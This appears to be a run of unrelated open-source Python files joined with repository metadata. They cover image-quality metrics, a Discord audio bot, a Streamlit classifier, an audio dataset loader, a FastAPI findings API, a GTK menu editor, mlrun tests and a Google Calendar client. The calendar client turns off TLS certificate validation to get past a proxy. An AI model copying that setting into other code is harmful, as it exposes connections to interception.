image = torch.matmul(image.permute(0, 2, 3, 1), weight).permute(0, 3, 1, 2) + 16.0
else:
weight = torch.tensor([[65.481, -37.797, 112.0],
[128.553, -74.203, -93.786],
[24.966, 112.0, -18.214]]).to(constants.DEVICE)
bias = torch.tensor([16, 128, 128]).view(1, 3, 1, 1).to(constants.DEVICE)
image = torch.matmul(image.permute(0, 2, 3, 1), weight).permute(0, 3, 1, 2) + bias
image /= 255.
return image
def _ssim(img1: torch.Tensor, img2: torch.Tensor, window_size: int, sigma: float, channels: int, batch_average: bool = True) -> torch.Tensor:
"""Caculate SSIM of 2 images.
Returns:
- Tensor: value of SSIM, which is (B,) if batch_average is not True and scalar if True.
"""
# to device
window = create_window(window_size, sigma, channels).to(constants.DEVICE)
img1 = img1.to(constants.DEVICE)
img2 = img2.to(constants.DEVICE)
c1 = (0.01 * constants.PIXEL_VALUE_RANGE)**2
c2 = (0.03 * constants.PIXEL_VALUE_RANGE)**2
mu1 = F.conv2d(img1, window, padding=window_size//2, groups=channels)
mu2 = F.conv2d(img2, window, padding=window_size//2, groups=channels)
mu1_sq = mu1.pow(2)
mu2_sq = mu2.pow(2)
mu1_mu2 = mu1*mu2
sigma1_sq = F.conv2d(img1*img1, window, padding = window_size//2, groups = channels) - mu1_sq
sigma2_sq = F.conv2d(img2*img2, window, padding = window_size//2, groups = channels) - mu2_sq
sigma12 = F.conv2d(img1*img2, window, padding = window_size//2, groups = channels) - mu1_mu2
ssim_map = ((2*mu1_mu2 + c1)*(2*sigma12 + c2))/((mu1_sq + mu2_sq + c1)*(sigma1_sq + sigma2_sq + c2))
if batch_average:
return ssim_map.mean()
else:
return ssim_map.mean(dim=(1,2,3))
class Metrics():
def __init__(
self,
extract_y_channel: bool = True) -> None:
""" Caculate PSNR and SSIM metrics.
- extract_y_channel: whether or not extract y channel in YCrCb format
then PSNR and SSIM will be computed on only y channel images.
"""
self.extract_y_channel = extract_y_channel
def extractYchannel(self):
self.lowres = rgb_to_ycbcr(self.lowres)
self.highres = rgb_to_ycbcr(self.highres)
def psnr(self, img1: torch.Tensor, img2: torch.Tensor):
""""""
img1 = img1.to(constants.DEVICE)
img2 = img2.to(constants.DEVICE)
rmse = torch.sqrt(F.mse_loss(img1, img2))
psnr = 20 * torch.log10(constants.PIXEL_VALUE_RANGE/ (rmse + 1e-10))
return psnr
def ssim(self, img1: torch.Tensor, img2: torch.Tensor):
""""""
return _ssim(img1, img2, window_size=11, sigma=0.15, channels=img1.size(-3))
| daoduyhungkaistgit/SRGAN | src/metrics.py | metrics.py | py | 4,011 | python | en | code | 3 | github-code | 36 |
70878385064 | from secrets import choice
from asyncio import sleep
import discord
from discord.ext import tasks, commands
from extras import constants
from utils.audio import YoutubeHelper, YTDLSource
from utils.docker import DockerLogger
from utils import decorators
class TiozaoZap(commands.Cog):
'''
TiozaoZap Cogs
'''
def __init__(self, client):
self.client = client
self.logger = DockerLogger(lvl=DockerLogger.INFO, prefix='TiozaoZap')
async def _play_from_url(self, ctx, video_url, send_message=False):
'''
Plays the zap audio.
'''
voice_client = discord.utils.get(self.client.voice_clients, guild=ctx.guild)
async with ctx.typing():
player = await YTDLSource.from_url(video_url, loop=self.client.loop)
voice_client.play(
player,
after=lambda e: print(f'Player error: %{e}') if e else None
)
if send_message:
await ctx.message.channel.send(f'Se liga nesse audio... {player.title}')
@commands.Cog.listener()
@commands.guild_only()
async def on_message(self, message):
'''
When any member sends a message inside a guild text-channel.
'''
# Cancels the request if the sender was a bot.
if message.author.bot:
return
# bozo xingo
if any(word in message.content.lower() for word in constants.BOZO_XINGO_TRIGGERS):
choice(constants.RESPOSTA_XINGO)
await message.channel.send(choice(constants.RESPOSTA_XINGO))
@commands.command(name='audio_do_zap', aliases=['zap', 'audio', 'audio_zap'])
@decorators.in_voice_chat_only
@commands.guild_only()
async def audio_do_zap(self, ctx):
'''
Plays a video of selection 'audios do zap' to the users channel.
'''
voice_channel = ctx.message.author.voice.channel
# Só tenta conectar se não está conectado, depois reseta
voice_client = discord.utils.get(self.client.voice_clients, guild=ctx.guild)
if not voice_client:
await voice_channel.connect()
voice_client = discord.utils.get(self.client.voice_clients, guild=ctx.guild)
await self._play_from_url(
ctx,
video_url=choice(YoutubeHelper.get_urls_list()),
send_message=True
)
self.logger.log(
f'{ctx.guild.id} - {ctx.message.author.id} requested ZAP_AUDIO',
lvl=self.logger.INFO
)
# Disconnects after 5 seconds of audio ending
while voice_client.is_playing():
await sleep(5)
await voice_client.disconnect()
@commands.command(name='sus_sound_effect', aliases=['sus'])
@decorators.in_voice_chat_only
@commands.guild_only()
async def play_sus_sound(self, ctx):
'''
Plays the "sus" sound effect from amongus.
'''
voice_channel = ctx.message.author.voice.channel
# Só tenta conectar se não está conectado, depois reseta
voice_client = discord.utils.get(self.client.voice_clients, guild=ctx.guild)
if not voice_client:
await voice_channel.connect()
voice_client = discord.utils.get(self.client.voice_clients, guild=ctx.guild)
await self._play_from_url(
ctx,
video_url=constants.SUS_VIDEO_URL,
send_message=False
)
self.logger.log(
f'{ctx.guild.id} - {ctx.message.author.id} requested ZAP_AUDIO',
lvl=self.logger.INFO
)
# Disconnects after 5 seconds of audio ending
while voice_client.is_playing():
await sleep(5)
await voice_client.disconnect()
def setup(client):
'''
Cog setup.
'''
client.add_cog(TiozaoZap(client))
| LombardiDaniel/Sebotiao | src/cogs/tiozao.py | tiozao.py | py | 3,850 | python | en | code | 1 | github-code | 36 |
455748841 | from astropy.io import fits
import numpy as np
hdulist=fits.open('/Users/dhk/work/cat/NGC_IC/VII_118.fits')
tb=hdulist[1].data
for x in range(0,len(tb)/1000+1):
f=open("sha_quarry_batch_%d.txt" % (x),"w")
f.write("COORD_SYSTEM: Equatorial\n")
f.write("EQUINOX: J2000\n")
f.write("NAME-RESOLVER: NED\n")
for y in range(x*1000,(x+1)*1000):
if y == len(tb) :
break
if tb[y][1]==' Gx':
if tb[y][0][0]=='I':
f.write('ic'+tb[y][0][1:].strip()+'\n')
else:
f.write('ngc'+tb[y][0].strip()+'\n')
f.close()
| DuhoKim/py_code_US | ngc_ic_cat.py | ngc_ic_cat.py | py | 533 | python | en | code | 0 | github-code | 36 |
6774316642 | import pickle
import streamlit as st
classifier_in=open("classifier.pkl","rb")
clf=pickle.load(classifier_in)
def predict_banknote(variance,skewness,kurtosis,entropy):
pred=clf.predict([[variance,skewness,kurtosis,entropy]])
if(pred[0]>0.5):
pred="Its a fake note"
else:
pred="It's a real banknote"
return pred
variance=st.number_input("Enter the variance")
skewness=st.number_input("Enter the skewness")
kurtosis=st.number_input("Enter the kurtosis")
entropy=st.number_input("Enter the entropy")
if(st.button("Predict")):
result=predict_banknote(variance,skewness,kurtosis,entropy)
st.success(result) | adamdavis99/Bank-Note-Authentication | streamlit_app.py | streamlit_app.py | py | 645 | python | en | code | 0 | github-code | 36 |
27970752684 | import shutil
import tarfile
from collections.abc import Sequence
from pathlib import Path
from typing import Callable, Generic, TypedDict, TypeVar
import lightning.pytorch as pl
import torch
import torchaudio
from einops import rearrange
from torch import Tensor
from torch.hub import download_url_to_file
from torch.utils.data import DataLoader, Dataset
from tqdm.auto import tqdm
T = TypeVar('T')
class SequenceDataset(Dataset, Generic[T]):
def __init__(self, entries: Sequence[T], transform: Callable[[T], T] | None = None) -> None:
super().__init__()
self.entries = entries
self.transform = transform
def __getitem__(self, index: int):
ret = self.entries[index]
if self.transform:
ret = self.transform(ret)
return ret
def __len__(self):
return len(self.entries)
class SignalTrainDatasetModuleParams(TypedDict):
root: str
batch_size: int
training_segment_length: int
validation_segment_length: int
testing_segment_length: int
class SignalTrainDatasetModule(pl.LightningDataModule):
sample_rate = 44_100
hparams: SignalTrainDatasetModuleParams
def __init__(
self,
root: str = './data/SignalTrain',
batch_size: int = 32,
training_segment_length: int = 2 ** 16,
validation_segment_length: int = 2 ** 18,
testing_segment_length: int = 2 ** 23,
) -> None:
super().__init__()
self.save_hyperparameters()
def prepare_data(self) -> None:
link = 'https://zenodo.org/record/3824876/files/SignalTrain_LA2A_Dataset_1.1.tgz'
root = Path(self.hparams['root'])
if (root / 'Train').exists():
print('The SignalTrain dataset has been downloaded. Skipping ... ')
return
root.mkdir(511, True, True)
d = root / 'temp.tgz'
download_url_to_file(link, d)
with tarfile.open(d, 'r') as tf:
tf.extractall()
d.unlink()
shutil.move(root / 'SignalTrain_LA2A_Dataset_1.1' / 'Train', root)
shutil.move(root / 'SignalTrain_LA2A_Dataset_1.1' / 'Test', root)
shutil.move(root / 'SignalTrain_LA2A_Dataset_1.1' / 'Val', root)
(root / 'SignalTrain_LA2A_Dataset_1.1').unlink()
def train_dataloader(self):
entries = self._read_data(
Path(self.hparams['root']) / 'Train',
self.hparams['training_segment_length'],
)
return DataLoader(
entries,
self.hparams['batch_size'],
num_workers=8,
shuffle=True,
pin_memory=True,
collate_fn=self._collate_fn
)
def val_dataloader(self):
entries = self._read_data(
Path(self.hparams['root']) / 'Val',
self.hparams['validation_segment_length'],
)
return DataLoader(
entries,
self.hparams['batch_size'],
num_workers=8,
shuffle=False,
pin_memory=True,
collate_fn=self._collate_fn
)
def test_dataloader(self):
entries = self._read_data(
Path(self.hparams['root']) / 'Test',
self.hparams['testing_segment_length'],
)
return DataLoader(
entries,
self.hparams['batch_size'],
num_workers=8,
shuffle=False,
pin_memory=True,
collate_fn=self._collate_fn
)
@staticmethod
def _collate_fn(batch: list[tuple[Tensor, Tensor, Tensor]]):
return (
torch.stack([b[0] for b in batch]),
torch.stack([b[1] for b in batch]),
torch.stack([b[2] for b in batch]),
)
@staticmethod
def _data_augmentation(entry: tuple[Tensor, Tensor, Tensor]):
x, y, cond = entry
if torch.rand([1]).item() < 0.5:
x *= -1
y *= -1
return x, y, cond
@classmethod
def _slice_audio(cls, file: Path, segment_length: int) -> list[Tensor]:
load_result: tuple[Tensor, int] = torchaudio.load(file) # type: ignore
dat, sr = load_result
assert sr == cls.sample_rate
dat.squeeze_(0)
if dat.dim() != 1:
raise ValueError(f'{file} is not a mono audio.')
size, trill = divmod(dat.size(0), segment_length)
if trill != 0:
dat = dat[:-trill]
dat = rearrange(dat, '(S L) -> S L', S=size)
return [dat[i] for i in range(dat.size(0))]
def _read_data(self, data_path: Path, segment_length: int):
entries: list[tuple[Tensor, Tensor, Tensor]] = []
all_files = sorted(data_path.glob('*.wav'))
for file in tqdm(all_files, desc=f'Loading dataset from {data_path}.'):
if file.name.startswith('input'):
continue
file_id = file.name[7:10]
switch_value, peak_reduction_value = map(
int, file.stem.split('__')[1:])
input_file = file.with_name(f'input_{file_id}_.wav')
input_datas = self._slice_audio(input_file, segment_length)
output_datas = self._slice_audio(file, segment_length)
for input_data, output_data in zip(input_datas, output_datas):
assert input_data.size() == output_data.size()
entries.append((
input_data,
output_data,
torch.tensor([
switch_value, peak_reduction_value
], dtype=torch.float32)
))
return SequenceDataset(entries, self._data_augmentation)
| int0thewind/s4-dynamic-range-compressor | s4drc/src/dataset.py | dataset.py | py | 5,685 | python | en | code | 1 | github-code | 36 |
3746051837 | # Standard Library
import json
import logging
import urllib.parse
# Third Party
from fastapi import APIRouter, Depends, HTTPException, Query, status
from fastapi_cache.decorator import cache
# First Party
from resc_backend.constants import (
CACHE_NAMESPACE_FINDING,
DEFAULT_RECORDS_PER_PAGE_LIMIT,
ERROR_MESSAGE_500,
ERROR_MESSAGE_503,
FINDINGS_TAG,
REDIS_CACHE_EXPIRE,
RWS_ROUTE_DETAILED_FINDINGS
)
from resc_backend.db.connection import Session
from resc_backend.resc_web_service.crud import detailed_finding as detailed_finding_crud
from resc_backend.resc_web_service.dependencies import get_db_connection
from resc_backend.resc_web_service.filters import FindingsFilter
from resc_backend.resc_web_service.helpers.resc_swagger_models import Model404
from resc_backend.resc_web_service.schema import detailed_finding as detailed_finding_schema
from resc_backend.resc_web_service.schema.pagination_model import PaginationModel
router = APIRouter(prefix=f"{RWS_ROUTE_DETAILED_FINDINGS}", tags=[FINDINGS_TAG])
logger = logging.getLogger(__name__)
@router.get("",
response_model=PaginationModel[detailed_finding_schema.DetailedFindingRead],
summary="Get all detailed findings",
status_code=status.HTTP_200_OK,
responses={
200: {"description": "Retrieve all the findings"},
500: {"description": ERROR_MESSAGE_500},
503: {"description": ERROR_MESSAGE_503}
})
@cache(namespace=CACHE_NAMESPACE_FINDING, expire=REDIS_CACHE_EXPIRE)
def get_all_detailed_findings(skip: int = Query(default=0, ge=0),
limit: int = Query(default=DEFAULT_RECORDS_PER_PAGE_LIMIT, ge=1),
db_connection: Session = Depends(get_db_connection),
query_string: str = None
) \
-> PaginationModel[detailed_finding_schema.DetailedFindingRead]:
"""
Retrieve all findings objects paginated
- **query_string**
A query string with the following format:
param1=value1¶m2=value2¶m3=value3
Where the possible parameters are:
- vcs_providers [enum] of type VCSProviders, possible values are: BITBUCKET, AZURE_DEVOPS.
Will default to all if non-specified.
- finding_statuses [enum of type FindingStatus], possible values are:NOT_ANALYZED,FALSE_POSITIVE,
TRUE_POSITIVE. Will default to all if non-specified.
- rule_pack_versions of type [String]
- rule_names of type [String]
- rule_tags of type [String] findings in the result will have at least one of the specified tags
for the rules
- project_name of type String
- repository_names of type [String]
- scan_ids of type list Integer
- start_date_time of type datetime with the following format: 1970-01-31T00:00:00
- end_date_time of type datetime with the following format: 1970-01-31T00:00:00
- **db_connection**
Session of the database connection
- **skip**
Integer amount of records to skip to support pagination
- **limit**
Integer amount of records to return, to support pagination
- **return** [FindingRead]
The output will contain a PaginationModel containing the list of DetailedFinding type objects,
or an empty list if no finding was found
"""
parsed_query_string_params = dict(urllib.parse.parse_qsl(query_string))
if parsed_query_string_params.get('scan_ids'):
parsed_query_string_params['scan_ids'] = json.loads(parsed_query_string_params['scan_ids'])
if parsed_query_string_params.get('vcs_providers'):
parsed_query_string_params['vcs_providers'] = json.loads(parsed_query_string_params['vcs_providers']
.replace('\'', '"'))
if parsed_query_string_params.get('finding_statuses'):
parsed_query_string_params['finding_statuses'] = json.loads(parsed_query_string_params['finding_statuses']
.replace('\'', '"'))
if parsed_query_string_params.get('rule_names'):
parsed_query_string_params['rule_names'] = json.loads(parsed_query_string_params['rule_names']
.replace('\'', '"'))
if parsed_query_string_params.get('rule_tags'):
parsed_query_string_params['rule_tags'] = json.loads(parsed_query_string_params['rule_tags']
.replace('\'', '"'))
if parsed_query_string_params.get('rule_pack_versions'):
parsed_query_string_params['rule_pack_versions'] = json.loads(parsed_query_string_params['rule_pack_versions']
.replace('\'', '"'))
findings_filter = FindingsFilter(**parsed_query_string_params)
findings = detailed_finding_crud.get_detailed_findings(
db_connection, findings_filter=findings_filter, skip=skip, limit=limit)
total_findings = detailed_finding_crud.get_detailed_findings_count(
db_connection, findings_filter=findings_filter)
return PaginationModel[detailed_finding_schema.DetailedFindingRead](
data=findings, total=total_findings, limit=limit, skip=skip)
@router.get("/{finding_id}",
response_model=detailed_finding_schema.DetailedFindingRead,
summary="Fetch detailed finding by ID",
status_code=status.HTTP_200_OK,
responses={
200: {"description": "Retrieve detailed finding <finding_id>"},
404: {"model": Model404, "description": "Finding <finding_id> not found"},
500: {"description": ERROR_MESSAGE_500},
503: {"description": ERROR_MESSAGE_503}
})
@cache(namespace=CACHE_NAMESPACE_FINDING, expire=REDIS_CACHE_EXPIRE)
def read_finding(finding_id: int, db_connection: Session = Depends(get_db_connection)) \
-> detailed_finding_schema.DetailedFindingRead:
"""
Retrieve detailed finding by its ID
- **db_connection**: Session of the database connection
- **finding_id**: ID of the finding for which details need to be fetched
- **return**: [DetailedFindingRead]
The output will contain the details of a finding
"""
db_finding = detailed_finding_crud.get_detailed_finding(db_connection, finding_id=finding_id)
if db_finding is None:
raise HTTPException(status_code=404, detail="Finding not found")
return db_finding
| abnamro/repository-scanner | components/resc-backend/src/resc_backend/resc_web_service/endpoints/detailed_findings.py | detailed_findings.py | py | 6,741 | python | en | code | 137 | github-code | 36 |
45138596236 | from .base_options import BaseOptions
class TrainOptions(BaseOptions):
def initialize(self, parser):
BaseOptions.initialize(self, parser)
# for displays
parser.add_argument('--save_epoch_freq', type=int, default=10, help='frequency of saving checkpoints at the end of epochs')
parser.add_argument('--no_html', action='store_true', help='do not save intermediate training results to [opt.checkpoints_dir]/[opt.name]/web/')
parser.add_argument('--tf_log', action='store_true', help='if specified, use tensorboard logging. Requires tensorflow installed')
# for training
parser.add_argument('--continue_train', action='store_true', help='continue training: load the latest model')
parser.add_argument('--which_epoch', type=str, default='latest', help='which epoch to load? set to latest to use latest cached model')
parser.add_argument('--beta1', type=float, default=0.0, help='momentum term of adam')
parser.add_argument('--beta2', type=float, default=0.9, help='momentum term of adam')
parser.add_argument('--no_TTUR', action='store_true', help='Use TTUR training scheme')
# the default values for beta1 and beta2 differ by TTUR option
opt, _ = parser.parse_known_args()
if opt.no_TTUR:
parser.set_defaults(beta1=0.5, beta2=0.999)
parser.add_argument('--lr', type=float, default=0.0002, help='initial learning rate for adam')
self.isTrain = True
return parser
| HBX-hbx/CGAN_jittor_landscape | options/train_options.py | train_options.py | py | 1,524 | python | en | code | 0 | github-code | 36 |
10456213892 | import numpy as np
from numpy.linalg import inv
W = np.loadtxt("W.txt", dtype='int')
W_inverse = inv(W)
with open('InvW.txt', 'wb') as file:
for line in W_inverse:
np.savetxt(file, line, fmt='%f')
| aditya059/MTP_Code | IBM_Work_On_Zhus_Paper/genInvW.py | genInvW.py | py | 212 | python | en | code | 0 | github-code | 36 |
19950192198 | import xdg.BaseDirectory
import xdg.MenuEditor
import gtk
import gio
import uxm.adapters as adapters
from uxm.adapters import xdg_adapter
def lookup_menu_files(filename):
return [f for f in xdg.BaseDirectory.load_config_paths('menus/' + filename)]
class MenuTreeModel(gtk.TreeStore):
(
COLUMN_HIDE,
COLUMN_TYPE,
COLUMN_ID,
COLUMN_NAME,
COLUMN_ICON,
COLUMN_MENU_FILE,
COLUMN_SYSTEM_VISIBLE,
COLUMN_USER_VISIBLE,
COLUMN_OBJECT
) = range(9)
COLUMN_LIST_PATH = 9
COLUMN_TYPES = (
bool, int, str, str, gio.Icon, str, bool, bool, object
)
def __init__(self, menu_file):
gtk.TreeStore.__init__(self, *self.COLUMN_TYPES)
if not menu_file:
menu_file = 'uxm-applications.menu'
self.menu_editor = xdg.MenuEditor.MenuEditor(menu_file)
root = xdg_adapter.XdgDirectoryAdapter(self.menu_editor.menu)
self.__append_directory(root, None, False, menu_file)
self.entries_list_iter = None
def to_liststore(self):
types = self.COLUMN_TYPES + (str,)
store = gtk.ListStore(*types)
columns = range(self.get_n_columns())
def add(model, path, it):
path = self.path_to_string(path)
row = self.get_row(it, columns) + (path,)
store.append(row)
self.foreach(add)
return store
def path_to_string(self, path):
if isinstance(path, str):
return path
return ':'.join((str(p) for p in path))
def string_to_path(self, path):
if isinstance(path, tuple):
return path
return tuple(path.split(':'))
def get_row(self, iter, columns=None):
if not columns:
columns = range(self.get_n_columns())
return self.get(iter, *columns)
def update(self, data):
t = data['type']
# update menu
if adapters.TYPE_ENTRY == t:
self.menu_editor.editMenuEntry(
data['object'].adaptee,
name=data['name'],
#genericname = data['name'],
comment=data['comment'],
command=data['command'],
icon=data['icon'],
terminal=data['terminal']
)
elif adapters.TYPE_DIRECTORY == t:
self.menu_editor.editMenu(
data['object'].adaptee,
name=data['name'],
#genericname = data['name'],
comment=data['comment'],
icon=data['icon'],
)
# update treemodel
it = self.get_iter_from_string(data['_path'])
obj = self.get_value(it, self.COLUMN_OBJECT)
icon = gio.ThemedIcon(str(obj.get_icon()), True)
self.set(
it,
self.COLUMN_ID, obj.get_filename(),
self.COLUMN_NAME, obj.get_display_name(),
self.COLUMN_ICON, icon
)
def create(self, data):
t = data['type']
parent_path = data['_parent']
parent_iter = self.get_iter_from_string(parent_path)
parent_entry = self.get_value(parent_iter, self.COLUMN_OBJECT)
if adapters.TYPE_ENTRY == t:
entry = self.menu_editor.createMenuEntry(
parent_entry and parent_entry.adaptee or None,
data['name'],
#genericname = data['name'],
comment=data['comment'],
command=data['command'],
icon=data['icon'],
terminal=data['terminal']
)
elif adapters.TYPE_DIRECTORY == t:
entry = self.menu_editor.createMenu(
parent_entry and parent_entry.adaptee or None,
data['name'],
#genericname = data['name'],
comment=data['comment'],
icon=data['icon'],
)
obj = xdg_adapter.factory(entry)
icon = gio.ThemedIcon(str(obj.get_icon()), True)
#FIXME: this doesn't update the view ???
self.append(
parent_iter,
(
t == adapters.TYPE_DIRECTORY,
obj.get_type(), obj.get_display_name(),
obj.get_display_name(), icon,
None, True, True,
obj
)
)
def __append_directory(self, directory, parent_iter, system, menu_file):
if not directory:
return
iter = self.iter_children(parent_iter)
while iter is not None:
if self.get_value(iter, self.COLUMN_ID) == directory.get_name():
break
iter = self.iter_next(iter)
if iter is None:
icon = gio.ThemedIcon(str(directory.get_icon()), True)
type = directory.get_type()
row = (
type == adapters.TYPE_ENTRY,
type, directory.get_name(),
directory.get_display_name(), icon,
menu_file, False, False,
directory
)
iter = self.append(parent_iter, row)
if system:
self.set_value(iter, self.COLUMN_SYSTEM_VISIBLE, True)
else:
self.set_value(iter, self.COLUMN_USER_VISIBLE, True)
for entry in directory:
current_type = entry.get_type()
if current_type == adapters.TYPE_DIRECTORY:
self.__append_directory(entry, iter, system, None)
if current_type != adapters.TYPE_ENTRY:
continue
child_iter = self.iter_children(iter)
while child_iter is not None:
if self.get_value(child_iter, self.COLUMN_TYPE) == adapters.TYPE_ENTRY and (
self.get_value(child_iter, self.COLUMN_ID) == entry.get_filename()
):
break
child_iter = self.iter_next(child_iter)
if child_iter is None:
icon = gio.ThemedIcon(str(entry.get_icon()), True)
type = entry.get_type()
row = (
type == adapters.TYPE_ENTRY,
type, entry.get_filename(),
entry.get_display_name(), icon,
None, False, False,
entry
)
child_iter = self.append(iter, row)
if system:
self.set_value(child_iter, self.COLUMN_SYSTEM_VISIBLE, entry.is_visible(), )
else:
self.set_value(child_iter, self.COLUMN_USER_VISIBLE, entry.is_visible(), )
| ju1ius/uxdgmenu | usr/lib/uxdgmenu/uxm/dialogs/editor/treemodel.py | treemodel.py | py | 6,603 | python | en | code | 17 | github-code | 36 |
22355326575 | import pathlib
from contextlib import nullcontext as does_not_raise
import pytest
import mlrun.runtimes.generators
@pytest.mark.parametrize(
"strategy,param_file,expected_generator_class,expected_error,expected_iterations",
[
(
"list",
"hyperparams.csv",
mlrun.runtimes.generators.ListGenerator,
does_not_raise(),
2,
),
(
"list",
"hyperparams.json",
mlrun.runtimes.generators.ListGenerator,
does_not_raise(),
2,
),
(
"grid",
"hyperparams.json",
mlrun.runtimes.generators.GridGenerator,
does_not_raise(),
4,
),
(
"random",
"hyperparams.json",
mlrun.runtimes.generators.RandomGenerator,
does_not_raise(),
# default max iterations
mlrun.runtimes.generators.default_max_iterations,
),
# no strategy, default to list
(
"",
"hyperparams.csv",
mlrun.runtimes.generators.ListGenerator,
does_not_raise(),
2,
),
# no strategy, default to grid
(
"",
"hyperparams.json",
mlrun.runtimes.generators.GridGenerator,
does_not_raise(),
4,
),
# invalid request
("grid", "hyperparams.csv", None, pytest.raises(ValueError), 0),
],
)
def test_get_generator(
rundb_mock,
strategy,
param_file,
expected_generator_class,
expected_error,
expected_iterations,
):
run_spec = mlrun.model.RunSpec(inputs={"input1": 1})
run_spec.strategy = strategy
run_spec.param_file = str(
pathlib.Path(__file__).absolute().parent / "assets" / param_file
)
execution = mlrun.run.MLClientCtx.from_dict(
mlrun.run.RunObject(spec=run_spec).to_dict(),
rundb_mock,
autocommit=False,
is_api=False,
store_run=False,
)
with expected_error:
generator = mlrun.runtimes.generators.get_generator(run_spec, execution, None)
assert isinstance(
generator, expected_generator_class
), f"unexpected generator type {type(generator)}"
iterations = sum(
1 for _ in generator.generate(mlrun.run.RunObject(spec=run_spec))
)
assert (
iterations == expected_iterations
), f"unexpected number of iterations {iterations}"
if strategy == "list":
assert generator.df.keys().to_list() == ["p1", "p2"]
elif strategy in ["grid", "random"]:
assert sorted(list(generator.hyperparams.keys())) == ["p1", "p2"]
| mlrun/mlrun | tests/runtimes/test_generators.py | test_generators.py | py | 2,780 | python | en | code | 1,129 | github-code | 36 |
13490200231 | class Personel():
def __init__(self,ad,soyad,yas,cinsiyet,maas):
self.ad=ad
self.soyad=soyad
self.yas=yas
self.cinsiyet=cinsiyet
self.maas=maas
def bilgileriYazdir(self):
print("""
{} {} Bilgileri şunlardır :
Yaşı : {}
Cinsiyet : {}
Maaş : {}
""".format(self.ad,self.soyad,self.yas,self.cinsiyet,self.maas))
def __str__(self):
return """
{} {} Bilgileri şunlardır :
Yaşı : {}
Cinsiyet : {}
Maaş : {}
""".format(self.ad,self.soyad,self.yas,self.cinsiyet,self.maas)
class Yonetici(Personel):
def __init__(self,ad,soyad,yas,cinsiyet,maas):
super().__init__(ad,soyad,yas,cinsiyet,maas)
def maasArtir(self,pObject, arttirmaMiktari=1000):
pObject.maas += arttirmaMiktari
personel=Personel("mert","sis","22","erkek",10000)
#personel.bilgileriYazdir()
print(personel)
yonetici=Yonetici("tolgayan","cayliyak","25","erkek",20000)
#print(yonetici)
yonetici.maasArtir(personel)
personel.bilgileriYazdir()
| AydinTokuslu/PythonTutorial | Ders_Konulari/Ders-18_Kalitim.py | Ders-18_Kalitim.py | py | 1,084 | python | tr | code | 0 | github-code | 36 |
74051194023 | #from apiclient.discovery import build
from googleapiclient.discovery import build
from oauth2client.service_account import ServiceAccountCredentials
import httplib2
#from oauth2client import client, file, tools
import datetime
import pytz
import re
import configparser
# """
# timezone/DST correction:
# """
# def getTimeFromUTC() ):
# #get the difference between localtime and now. round to half hours
# #N.B. bad b/c daylight saving!
# secdiff=(datetime.datetime.utcnow() - datetime.datetime.now()).total_seconds()
# hourdiff=round(secdiff/60,2)
# return( datetime.timedelta(seconds=hourdiff*60) )
#DELTAFROMUTC = getTimeFromUTC()
def to_utc(dt, tzstr="America/New_York"):
tz = pytz.timezone(tzstr)
return(dt - tz.utcoffset(dt))
# later when printing, will get the same time as we put in
# utc=pytz.timezone('UTC')
# return( tz.localize(dt).astimezone( utc ) )
# def to_tz(dt,tzstr="America/New_York"):
# tz=pytz.timezone(tzstr)
# utc=pytz.timezone('UTC')
# return( utc.localize(dt).astimezone( tz ) )
def get_service(api_name, api_version, scope, key_file_location,
service_account_email):
credentials = ServiceAccountCredentials.from_p12_keyfile(
service_account_email, key_file_location, scopes=scope)
# UPMC MItM's our SSL connection: disable_ssl_certificate_validation=True
# todo: add as config switch
http = credentials.authorize(httplib2.Http(
disable_ssl_certificate_validation=True))
# Build the service object.
service = build(api_name, api_version, http=http)
return service
def g2time(dtstr):
"""
google time string to datetime
-> google gives back time in localtime
"""
return(datetime.datetime.strptime(dtstr[0:18], '%Y-%m-%dT%H:%M:%S'))
def calInfo(e):
"""
get calendar info from google api returned dict
split summary into expected parts: study age sex subj_initials ra score
"""
d = {
'start': e['start']['dateTime'],
'starttime': g2time(e['start']['dateTime']),
'dur_hr': (g2time(e['end']['dateTime']) - g2time(e['start']['dateTime'])).seconds / 60 / 60,
'creator': e['creator'].get('displayName'),
'note': e.get('description'),
'calid': e.get('id'),
'summary': e.get('summary'),
'htmlLink': e.get('htmlLink')
}
c = re.compile(
r'(?P<study>[a-z/]+)[ -]*(?P<age>[0-9.]+) *yo(?P<sex>m|f) *\(?(?P<subjinit>[A-Z]{2,3})\)? *(?P<ra>[A-Z]{2,3})[ -]*(?P<score>[0-9.]+)',
re.I)
m = re.search(c, e['summary'])
if m:
md = m.groupdict()
d = {**d, **md}
return(d)
def time2g(dt, tzstr="America/New_York"):
dtutc = to_utc(dt)
return(dtutc.isoformat() + 'Z')
def time2gdict(dt,
tzstr="America/New_York"): return({'dateTime': time2g(dt),
'timeZone': tzstr})
"""
a class containing a connection to our google calendar
"""
class LNCDcal():
# authetenticate
# ini: cal.ini
# [Calendar]
# email = 'yyy@xxx.iam.gserviceaccount.com'
# p12 = '/path/to/creds.p12'
# calID = 'email@gmail.com'
# tz = 'America/New_York'
def __init__(self, ini):
# Define the auth scopes to request.
# -- read in from ini
config = configparser.RawConfigParser()
config.read(ini)
service_account_email = config.get('Calendar', 'email')
key_file_location = config.get('Calendar', 'p12')
self.calendarId = config.get('Calendar', 'calID')
self.backCalID = config.get('Calendar', 'backCalID', fallback=None)
self.tzstr = config.get('Calendar', 'tz')
scope = ['https://www.googleapis.com/auth/calendar']
self.cal = get_service('calendar', 'v3', scope, key_file_location,
service_account_email)
# might need to be updated after events are add
self.events = self.cal.events()
def find_in_range(self, dtmin, dtmax):
if(isinstance(dtmin, datetime.datetime)):
dtmin = time2g(dtmin)
if(isinstance(dtmax, datetime.datetime)):
dtmax = time2g(dtmax)
events = self.events.list(
calendarId=self.calendarId,
singleEvents=True,
timeMin=dtmin,
timeMax=dtmax).execute()
# use only events with datetime starts (remove full day events)
items = [calInfo(i) for i in events['items']
if i['start'].get('dateTime')]
# check time
#dt.isoformat()[0:16] == items[0]['start']['dateTime'][0:16]
return(items)
def find(self, dt):
delta = 10
dtmin = dt - datetime.timedelta(minutes=delta)
dtmax = dt + datetime.timedelta(minutes=delta)
items = self.find_in_range(dtmin, dtmax)
return(items)
def upcoming(self, daydelta=5):
dt = datetime.datetime.now()
dtmin = time2g(dt, self.tzstr)
dtmax = time2g(dt + datetime.timedelta(days=daydelta), self.tzstr)
items = self.find_in_range(dtmin, dtmax)
return(items)
def insert_event(self, startdt, dur_h, summary, desc):
endtime = startdt + datetime.timedelta(hours=dur_h)
event = {
'summary': summary,
'description': desc,
'start': time2gdict(startdt, self.tzstr),
'end': time2gdict(endtime, self.tzstr)
}
eventres = self.cal.events().insert(
calendarId=self.calendarId, body=event).execute()
return(eventres)
def delete_event(self, eventId):
res = self.cal.events().delete(
